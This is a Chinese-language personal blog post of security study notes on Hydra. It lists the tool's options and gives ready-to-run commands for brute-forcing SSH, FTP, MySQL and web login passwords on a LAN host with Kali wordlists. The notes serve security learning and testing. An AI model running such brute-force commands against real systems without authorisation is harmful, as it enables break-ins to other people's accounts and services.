<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="今天又碰到了需要使用到hydra的场景，为了加深自己对使用命令的印象，同时也是为了今后再忘记时可以快速索引到自己所需要的知识点写下了今天这篇博客。 所用到的知识均来自网络。">
<meta property="og:type" content="article">
<meta property="og:title" content="Hydra使用笔记">
<meta property="og:url" content="http://yoursite.com/2019/11/11/Hydra%E4%BD%BF%E7%94%A8%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="Bu1&#39;Blog">
<meta property="og:description" content="今天又碰到了需要使用到hydra的场景，为了加深自己对使用命令的印象，同时也是为了今后再忘记时可以快速索引到自己所需要的知识点写下了今天这篇博客。 所用到的知识均来自网络。">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2019-11-11T11:21:45.000Z">
<meta property="article:modified_time" content="2019-12-09T12:30:38.624Z">
<meta property="article:author" content="Bu1">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://yoursite.com/2019/11/11/Hydra%E4%BD%BF%E7%94%A8%E7%AC%94%E8%AE%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Hydra使用笔记 | Bu1'Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Bu1'Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">如果能控制粗鄙的狂喜，就不会有深入骨髓的悲伤。</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/11/11/Hydra%E4%BD%BF%E7%94%A8%E7%AC%94%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Bu1">
      <meta itemprop="description" content="最为惊艳的是思想碰撞产生的火花。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Bu1'Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Hydra使用笔记
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-11-11 19:21:45" itemprop="dateCreated datePublished" datetime="2019-11-11T19:21:45+08:00">2019-11-11</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2019-12-09 20:30:38" itemprop="dateModified" datetime="2019-12-09T20:30:38+08:00">2019-12-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/WEB%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">WEB安全学习笔记</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>今天又碰到了需要使用到hydra的场景，为了加深自己对使用命令的印象，同时也是为了今后再忘记时可以快速索引到自己所需要的知识点写下了今天这篇博客。</p>
<p>所用到的知识均来自网络。</p>
<span id="more"></span>

<hr>
<h2 id="Hydra简介"><a href="#Hydra简介" class="headerlink" title="Hydra简介"></a>Hydra简介</h2><p>hydra是一个自动化的爆破工具，暴力破解弱密码，是一个支持众多协议的爆破工具，已经集成到KaliLinux中，直接在终端打开即可。</p>
<p>支持的常用服务：POP3，SMB，RDP，SSH，FTP，POP3，Telnet，MYSQL…</p>
<h2 id="Hydta使用参数"><a href="#Hydta使用参数" class="headerlink" title="Hydta使用参数"></a>Hydta使用参数</h2><p>-h 帮助文档baop</p>
<p>-R  继续上一次进度破解</p>
<p>-S 采用SSL连接</p>
<p>-s PORT  指定非默认端口</p>
<p>-e ns可选选项，n：空密码探测，s：指定用户密码探测</p>
<p>-l  LOGIN 指定要破解的用户</p>
<p>-L FILE   指定用户名字典破解</p>
<p>-p FILE  指定单密码</p>
<p>-P FILE  指定要使用的密码字典破解</p>
<p>-C FILE 使用冒号分割的格式，如“login:pass”来替代-L/-P参数</p>
<p>-t TASKS  同时运行的线程数量，默认16线程</p>
<p>-M 指定多目标(文件内格式为地址：端口)</p>
<p>-w TIME  设置最大超时时间，单位秒。默认30s</p>
<p>-v/-V 显示爆破详细信息</p>
<p>-f 如果爆破成功则停止爆破</p>
<h2 id="Hydta实战用法"><a href="#Hydta实战用法" class="headerlink" title="Hydta实战用法"></a>Hydta实战用法</h2><ul>
<li>爆破SSH服务</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 11 -s 20000 -v -f ssh://192.168.0.110</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra 192.168.0.110 ssh -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 11 -s 20000 -v -f</span><br></pre></td></tr></table></figure>

<blockquote>
<p>攻击目标：192.168.0.110</p>
<p>使用的模块：ssh</p>
<p>爆破的用户名：root(-l)</p>
<p>爆破的密码字典：/usr/share/wordlists/metasploit/unix_passwords.txt（*kali自带字典目     录：/usr/share/wordlists/metasploit/*）(-P)</p>
<p>爆破的线程数：11(-t)</p>
<p>显示详细信息：(-v)</p>
<p>爆破成功一个后停止(-f)</p>
</blockquote>
<ul>
<li>爆破FTP服务</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 11 -s 20000 -v -f ftp://192.168.0.110</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra 192.168.0.110 ftp -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 11 -s 20000 -v -f</span><br></pre></td></tr></table></figure>

<blockquote>
<p>攻击目标：192.168.0.110</p>
<p>使用的模块：ftp</p>
<p>其余同上</p>
</blockquote>
<ul>
<li>爆破Mysql</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -L username.txt -P password.txt mysql://192.168.0.110:mysql端口号</span><br></pre></td></tr></table></figure>



<ul>
<li>破解web登录</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">get方式：hydra -l 用户名 -p 密码字典 -t 线程 -vV IP http-get /login.php</span><br></pre></td></tr></table></figure>






    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2019/11/10/%E7%AC%AC%E4%B8%80%E5%91%A8%EF%BC%9A-%E6%90%AD%E5%BB%BA-web-%E8%BF%90%E8%A1%8C%E7%9A%84%E5%9F%BA%E7%A1%80%E7%8E%AF%E5%A2%83/" rel="prev" title="第一周:搭建WEB运行的基础环境">
      <i class="fa fa-chevron-left"></i> 第一周:搭建WEB运行的基础环境
    </a></div>
      <div class="post-nav-item">
    <a href="/2019/11/13/%E4%BB%8E%E4%B8%80%E9%81%93CTF%E9%A2%98%E4%B8%AD%E5%AD%A6%E4%B9%A0php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E4%BC%AA%E5%8D%8F%E8%AE%AE/" rel="next" title="从一道CTF题中学习php反序列化与伪协议">
      从一道CTF题中学习php反序列化与伪协议 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Hydra%E7%AE%80%E4%BB%8B"><span class="nav-number">1.</span> <span class="nav-text">Hydra简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Hydta%E4%BD%BF%E7%94%A8%E5%8F%82%E6%95%B0"><span class="nav-number">2.</span> <span class="nav-text">Hydta使用参数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Hydta%E5%AE%9E%E6%88%98%E7%94%A8%E6%B3%95"><span class="nav-number">3.</span> <span class="nav-text">Hydta实战用法</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Bu1</p>
  <div class="site-description" itemprop="description">最为惊艳的是思想碰撞产生的火花。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">43</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Bu1</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
